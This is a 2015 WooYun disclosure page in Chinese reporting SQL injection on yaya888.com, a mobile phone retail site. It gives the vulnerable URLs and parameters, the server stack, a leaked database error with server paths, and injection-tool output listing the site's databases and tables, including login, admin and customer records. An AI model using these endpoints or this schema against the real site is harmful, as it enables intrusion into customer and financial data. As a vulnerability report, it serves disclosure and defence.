当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101874

漏洞标题:丫丫手机网root权限注入整理

相关厂商:yaya888.com

漏洞作者: 爱上平顶山

提交时间:2015-03-18 12:04

修复时间:2015-05-02 12:38

公开时间:2015-05-02 12:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-18: 细节已通知厂商并且等待厂商处理中
2015-03-18: 厂商已经确认,细节仅向厂商公开
2015-03-28: 细节向核心白帽子及相关领域专家公开
2015-04-07: 细节向普通白帽子公开
2015-04-17: 细节向实习白帽子公开
2015-05-02: 细节向公众公开

简要描述:

凑热闹

详细说明:

丫丫手机网
点:
http://appweb.yaya888.com/activity.php?aid=38
通用注入点: order_info.php?orderid= 各城市通用
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.2.8
back-end DBMS: MySQL >= 5.0.0

Fatal error: Uncaught exception 'Exception' with message ' MySQL Query Error<br> <b>SQL</b>: SELECT * FROM sys_phone_zhuanti WHERE id=38’ and status=1 LIMIT 1<br> <b>错误详情</b>: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '’ and status=1 LIMIT 1' at line 1<br> <b>错误代码</b>:1064<br>' in D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkMysql.class.php:178 Stack trace: #0 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkMysql.class.php(24): TrunkMysql->error('MySQL Query Err...') #1 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkModel.class.php(64): TrunkMysql->query('SELECT * FROM s...', Array) #2 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkModel.class.php(103): TrunkModel->query('SELECT * FROM s...', Array, true) #3 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkModel.class.php(94): TrunkModel->select() #4 D:\wwwroot\yaya_app_ftp\wwwroot\activity.php( in D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkMysql.class.php on line 178


available databases [10]:
[*] baobao
[*] information_schema
[*] kmyaya
[*] kmyaya6
[*] kmyaya_bak
[*] kmyaya_bak2
[*] kmyaya_bak3
[*] mysql
[*] test
[*] yaya_appapi
Database: kmyaya
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| oa_stock_archive | 4155088 |
| oa_stock_detail | 2225331 |
| oa_document | 678186 |
| oa_user_login | 632461 |
| oa_stock | 582150 |
| oa_money_detail | 353629 |
| oa_customer_log | 279368 |
| oa_customer | 189993 |
| sys_search | 170864 |
| oa_ip | 169867 |
| oa_service | 133194 |
| sys_goods_price | 119658 |
| oa_stock_booking | 114983 |
| oa_stock_move | 110220 |
| oa_iplogin | 88490 |
| oa_user_log | 83881 |
| sys_goods_price_edit | 72330 |
| sys_client_records | 61834 |
| sys_goods_with | 40973 |
| sys_image | 38405 |
| sys_weixin_openid | 37473 |
| sys_comment | 36565 |
| sys_user_login_log | 28094 |
| coupon_verify | 24815 |
| sys_admin_login | 23900 |
| sys_member_care | 23355 |
| webapp_init_log | 23203 |
| sys_member_login | 22764 |
| game_zhuanpan_open | 22118 |
| sys_weixin_qrcode | 19958 |
| sms_sended | 19732 |
| sys_push_log | 16359 |
| sys_member | 14638 |
| game_zhuanpan_open_bak | 12594 |
| sys_order_list | 11279 |
| sys_article | 11258 |
| oa_stock_inventory | 10715 |
| sys_tracert | 10451 |
| sys_goods_product | 10016 |
| lottery_log | 10002 |
| sys_yhm_codes | 9885 |
| game_zhuanpan_user | 9785 |
| sys_order | 9700 |
| oa_wx_status | 9179 |
| sys_verify | 7369 |
| coupon_visits | 6842 |
| oa_active_order | 6592 |
| sys_admin_log | 6003 |
| game_zhuanpan_user_bak | 5271 |
| sys_district | 5026 |
| sys_client_question | 4962 |
| sys_goods | 4662 |
| sys_weixin_user | 4353 |
| sys_cup_taking | 3903 |
| sys_goods_package | 3636 |
| sys_address | 3385 |
| sys_cup_comment | 2433 |
| sys_user_everyday | 2266 |
| sys_weixin_zan | 2229 |
| sys_cart | 2171 |
| oa_computer | 2023 |
| sys_weixin_token | 1985 |
| game_zhuanpan_gift | 1901 |
| oa_offer_code | 1662 |
| game_zhuanpan_gift_bak | 1151 |
| sys_game_user | 1133 |
| sms_sending | 1000 |
| sys_cprice | 986 |
| sys_weixin_user_msg | 844 |
| sys_game_gift | 782 |
| sys_game_order | 778 |
| game_cd_gift | 743 |
| sys_send_address | 690 |
| oa_user | 686 |
| oa_active_log | 663 |
| sys_bai_nian | 533 |
| game_cd_user | 489 |
| oa_personnel_files | 460 |
| oa_article | 456 |
| sys_help_article | 434 |
| sys_soft | 348 |
| sys_soft_ver | 340 |
| sys_nianhui_scores | 290 |
| game_zhuanpan_pici | 281 |
| sys_nianhui_uses | 232 |
| sys_weixin_yaya | 228 |
| sys_nianhui_user | 182 |
| sys_app_fenlei | 173 |
| sys_advertisement | 156 |
| coupon_stuff | 147 |
| sys_tearch_msg | 125 |
| yy_comment | 124 |
| sys_ads | 113 |
| sys_brands | 109 |
| sys_actgoods | 103 |
| sys_yhm_rules | 98 |
| oa_modlist | 91 |
| sys_goods_with_price | 86 |
| sys_product_cat | 84 |
| sys_goods_cat | 80 |
| sys_hot_links | 79 |
| sys_brand | 70 |
| oa_set_parameter | 66 |
| sys_cup_match | 64 |
| sys_nav | 64 |
| oa_set_depart | 62 |
| sys_ad_position | 57 |
| sys_goods_type | 51 |
| sys_client_phone | 46 |
| oa_usergroup | 45 |
| sys_friendlink | 44 |
| sys_admin | 37 |
| oa_set_shop | 33 |
| sys_knowledge | 33 |
| sys_index_goods | 32 |
| sys_order_price_edit | 31 |
| oa_money_account | 29 |
| sys_phone_zhuanti | 29 |
| oa_money_class | 27 |
| sys_client_company | 27 |
| webapp_auth_login | 26 |
| sys_shops | 25 |
| sys_yhm_codes3 | 24 |
| lottery_activity | 23 |
| oa_url | 23 |
| sys_sites_shop | 22 |
| lottery | 21 |
| sys_shop | 21 |
| sms_tpl | 18 |
| sys_byself | 17 |
| oa_reset | 13 |
| sys_friend_link | 13 |
| webapp_point | 13 |
| sys_contract_config | 12 |
| sys_sites | 12 |
| sys_nianhui_shows | 11 |
| oa_offer_task | 10 |
| sys_wxmoney_test | 10 |
| coupon_con | 8 |
| oa_set_member_rank | 8 |
| sys_article_cat | 8 |
| webapp_upload_image | 8 |
| webapp_upload_voice | 7 |
| sys_game_batch | 6 |
| oa_qwgh | 5 |
| sys_ad | 4 |
| sys_codesend | 4 |
| sys_nav_type | 4 |
| sys_contract_a | 3 |
| sys_game_type | 3 |
| sys_group | 3 |
| sys_phone_zhuanti_tpl | 3 |
| sys_specialprice | 3 |
| webapp_share | 3 |
| oa_customer_score_log | 2 |
| sys_shopcart | 2 |
| sys_site | 2 |
| webapp_init | 2 |
| oa_offer_event | 1 |
| sms_user | 1 |
| sys_contract | 1 |
| sys_phone_num | 1 |
| sys_up_views | 1 |
| sys_web_youhui | 1 |
+------------------------+---------+


ok

漏洞证明:

···

修复方案:

过滤

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-18 12:36

厂商回复:

谢谢您

最新状态:

暂无